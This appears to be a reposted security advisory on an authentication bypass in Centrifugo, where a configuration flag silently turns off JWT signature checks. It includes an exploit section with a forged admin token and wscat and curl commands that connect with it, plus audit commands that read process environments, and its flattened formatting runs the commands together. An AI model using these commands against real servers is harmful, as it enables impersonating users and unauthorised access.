Listen to this Post
The `insecure_skip_token_signature_verify` flag in Centrifugo, when set to true, completely disables JWT signature verification. This flag is defined in `internal/configtypes/types.go` and passed directly to the token verification logic in `internal/client/handler.go` . In token_verifier_jwt.go, when `skipVerify` is true, the entire signature verification block is bypassed, allowing any JWT token to be accepted regardless of its signature validity . The flag can be enabled through multiple vectors including config files, environment variables (CENTRIFUGO_INSECURE_SKIP_TOKEN_SIGNATURE_VERIFY=true), or YAML/TOML formats. Critically, no warning is logged at startup or runtime when this flag is active, making the insecure state invisible to operators. Even with a legitimate `hmac_secret_key` configured, startup logs falsely imply verification is active by showing “enabled JWT verifiers”. A Proof of Concept demonstrates that with this flag enabled, a token signed with a completely wrong key is fully accepted, allowing unauthenticated connection as any arbitrary user ID. The vulnerability affects all connection types including WebSocket, HTTP-streaming, SSE, and gRPC, and can be easily triggered accidentally via environment variable injection in containerized deployments.
Platform: Centrifugo
Version: < 6.7.0
Vulnerability: Authentication Bypass
Severity: Critical
Date: 2026-03-12
Prediction: Patch Q2 2026
What Undercode Say:
Analytics
The vulnerability stems from a dangerous configuration flag that completely disables JWT signature verification without any warning to operators. The code path bypasses signature validation when insecure_skip_token_signature_verify=true, creating a silent authentication bypass. The flag’s propagation from config to token verification calls is direct and unconditional, with no runtime indicators that security controls are disabled. This design flaw makes accidental production exposure undetectable through normal monitoring channels.
Exploit:
Generate a malicious JWT with any arbitrary signature cat > malicious_token.txt << 'EOF' eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.invalid-signature-here EOF Connect to vulnerable Centrifugo server using WebSocket wscat -c "ws://vulnerable-centrifugo:8000/connection/websocket?token=$(cat malicious_token.txt)" Using curl with HTTP-streaming curl -X POST "http://vulnerable-centrifugo:8000/connection/http_stream" \ -H "Authorization: Bearer $(cat malicious_token.txt)" Environment variable injection in container docker run -e CENTRIFUGO_INSECURE_SKIP_TOKEN_SIGNATURE_VERIFY=true \ -e CENTRIFUGO_CLIENT_TOKEN_HMAC_SECRET_KEY=legitimate-secret \ centrifugo/centrifugo:v6.5.0
Protection from this CVE
1. Immediate: Set `insecure_skip_token_signature_verify: false` in all configurations
- Verification: Check all environment variables and config files for the insecure flag:
Search for the flag in running containers docker ps | grep centrifugo | awk '{print $1}' | xargs -I {} docker inspect {} | grep -i insecure_skip Check environment variables in processes ps aux | grep centrifugo | grep -v grep | awk '{print $2}' | xargs -I {} cat /proc/{}/environ | tr '\0' '\n' | grep INSECURE_SKIP Audit all config files find /etc -name "centrifugo" -exec grep -l "insecure_skip_token_signature_verify" {} \;
3. Code Review: Implement startup warnings
// Add this to your fork or request in upstream
if cfg.Client.InsecureSkipTokenSignatureVerify {
log.Fatal().Msg("SECURITY ALERT: JWT signature verification DISABLED - this is UNSAFE for production")
}
Impact
- Complete authentication bypass allowing arbitrary user impersonation
- No audit trail or logs indicating the insecure state
- Silent failure mode makes detection impossible without manual config audit
- Affects all connection types and deployment scenarios
- Particularly dangerous in containerized environments where environment variables can be injected accidentally
- Undermines all JWT-based security controls including expiration, audience, and issuer validation
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
